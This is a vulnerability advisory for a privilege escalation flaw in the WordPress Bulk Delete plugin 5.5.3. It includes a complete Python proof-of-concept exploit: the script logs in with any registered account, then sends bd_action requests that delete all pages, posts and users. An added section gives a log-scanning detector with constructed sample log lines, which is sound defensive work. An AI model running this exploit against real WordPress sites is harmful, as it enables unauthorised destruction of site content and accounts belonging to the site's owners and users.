WordPress Bulk Delete Plugin 5.5.3 - Privilege Escalation
- Vulnerability title: WordPress Bulk Delete plugin [Privilege Escalation]
- Discovery date: 10 February 2016
- Vulnerability author: Panagiotis Vagenas
- Software link: https://wordpress.org/plugins/bulk-delete/
- Version: 5.5.3
- Tested on: WordPress 4.4.2
- Category: WebApps, WordPress
Description:
Any user can escalate privileges through the task handling provided by _Bulk Delete_. Not every part of the plugin can be driven this way; the following actions are affected:
- bd_delete_pages_by_status: deletes all pages by status
- bd_delete_posts_by_post_type: deletes all posts by post type
- bd_delete_users_by_meta: deletes all users matching a specific meta value
Any user registered on the site can execute a bd_action through this flaw, so this is a privilege escalation vulnerability.
The proof of concept below tests for the vulnerability:
```python
#!/usr/bin/python3
################################################################################
# Bulk Delete Privilege Escalation Exploit
#
# **IMPORTANT** Don't use this in a production site, if vulnerable it will
# delete nearly all your sites content
#
# Author: Panagiotis Vagenas <pan.vagenas@gmail.com>
################################################################################
import sys

import requests

loginUrl = 'http://example.com/wp-login.php'
adminUrl = 'http://example.com/wp-admin/index.php'

# Credentials of any registered (low-privileged) account on the site under test
loginPostData = {
    'log': 'username',
    'pwd': 'password',
    'rememberme': 'forever',
    'wp-submit': 'Log+In'
}

# A successful login answers with a redirect; the session cookies are set on
# that first (redirect) response, so they are read from the response history.
l = requests.post(loginUrl, data=loginPostData)
if (l.status_code != 200 or len(l.history) == 0
        or len(l.history[0].cookies) == 0):
    print("Couldn't acquire a valid session")
    sys.exit(1)

loggedInCookies = l.history[0].cookies


def do_action(action, data):
    # The bd_action query parameter is handled on wp-admin/index.php
    try:
        requests.post(
            adminUrl + '?bd_action=' + action,
            data=data,
            cookies=loggedInCookies,
            timeout=30
        )
    except requests.exceptions.Timeout:
        print('Action ' + action + ' timed out')
    else:
        print('Action ' + action + ' performed')


print('Deleting all pages')
do_action(
    'delete_pages_by_status',
    {
        'smbd_pages_force_delete': 'true',
        'smbd_published_pages': 'published_pages',
        'smbd_draft_pages': 'draft_pages',
        'smbd_pending_pages': 'pending_pages',
        'smbd_future_pages': 'future_pages',
        'smbd_private_pages': 'private_pages',
    }
)

print('Deleting all posts from all default post types')
do_action('delete_posts_by_post_type', {'smbd_types[]': [
    'post',
    'page',
    'attachment',
    'revision',
    'nav_menu_item'
]})

print('Deleting all users')
do_action(
    'delete_users_by_meta',
    {
        'smbd_u_meta_key': 'nickname',
        'smbd_u_meta_compare': 'LIKE',
        'smbd_u_meta_value': '',
    }
)

sys.exit(0)
```
This code is offensive in nature; comply with local laws and regulations.
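For site operators, the requests the PoC issues leave a clear trace: POSTs to wp-admin/index.php carrying a bd_action query parameter. The following added example (not part of the original advisory) scans web server access log lines in Common Log Format for such requests and flags the three action names the advisory lists; the log lines and client addresses are constructed for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# The three bd_action values the advisory names as reachable by any
# registered user (advisory names without the bd_ prefix).
DESTRUCTIVE_ACTIONS = {
    "delete_pages_by_status",
    "delete_posts_by_post_type",
    "delete_users_by_meta",
}

# Common Log Format: client - user [timestamp] "METHOD path HTTP/x" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def find_bulk_delete_actions(log_lines):
    """One record per request to wp-admin/index.php that carries bd_action."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        url = urlsplit(m.group("path"))
        if not url.path.endswith("/wp-admin/index.php"):
            continue  # the vulnerable handler is only reached via index.php
        for action in parse_qs(url.query).get("bd_action", []):
            hits.append({
                "ip": m.group("ip"),
                "time": m.group("time"),
                "method": m.group("method"),
                "status": int(m.group("status")),
                "action": action,
                "destructive": action in DESTRUCTIVE_ACTIONS,
            })
    return hits

# Constructed sample log lines (RFC 5737 documentation addresses), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Feb/2016:14:02:11 +0000] "POST /wp-admin/index.php?bd_action=delete_pages_by_status HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Feb/2016:14:02:12 +0000] "POST /wp-admin/index.php?bd_action=delete_users_by_meta HTTP/1.1" 200 498',
    '198.51.100.4 - - [10/Feb/2016:14:03:00 +0000] "GET /wp-admin/index.php HTTP/1.1" 200 9210',
    '198.51.100.4 - - [10/Feb/2016:14:03:05 +0000] "GET /wp-admin/admin.php?page=some-other-page HTTP/1.1" 200 8800',
    '203.0.113.7 - - [10/Feb/2016:14:02:13 +0000] "POST /wp-admin/index.php?bd_action=example_other_action HTTP/1.1" 200 300',
]
```

Any bd_action request from an account that is not an administrator is worth an alert on an unpatched 5.5.3 install; the "destructive" flag marks the three actions the advisory shows.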